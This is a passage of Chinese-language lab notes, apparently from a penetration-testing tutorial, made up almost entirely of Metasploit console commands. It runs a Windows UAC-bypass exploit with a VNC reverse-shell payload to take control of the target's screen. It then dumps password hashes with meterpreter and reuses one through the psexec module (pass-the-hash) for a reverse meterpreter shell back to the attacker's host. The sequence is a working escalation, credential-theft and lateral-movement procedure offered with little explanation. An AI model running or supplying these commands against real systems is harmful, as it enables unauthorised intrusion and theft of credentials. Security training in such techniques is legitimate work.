获取图形化payload
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 5
msf exploit(bypassuac) > set payload windows/vncinject/reverse_tcp
msf exploit(bypassuac) > exploit
msf exploit(bypassuac) > set viewonly false 如果想操作目标主机,可以把viewonly设置成false
Passthehash
get到system权限后,使用hashdump获取用户名和密码的hash值
meterpreter > hashdump
Psexec 模块之 Passthehash(使用“用户名+密码的hash值”来登录目标系统 )
在本次实验中,要确保目标主机的UAC是关闭的。
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.80.33
msf exploit(psexec) > set smbuser a
msf exploit(psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.80.163
msf exploit(psexec) > exploit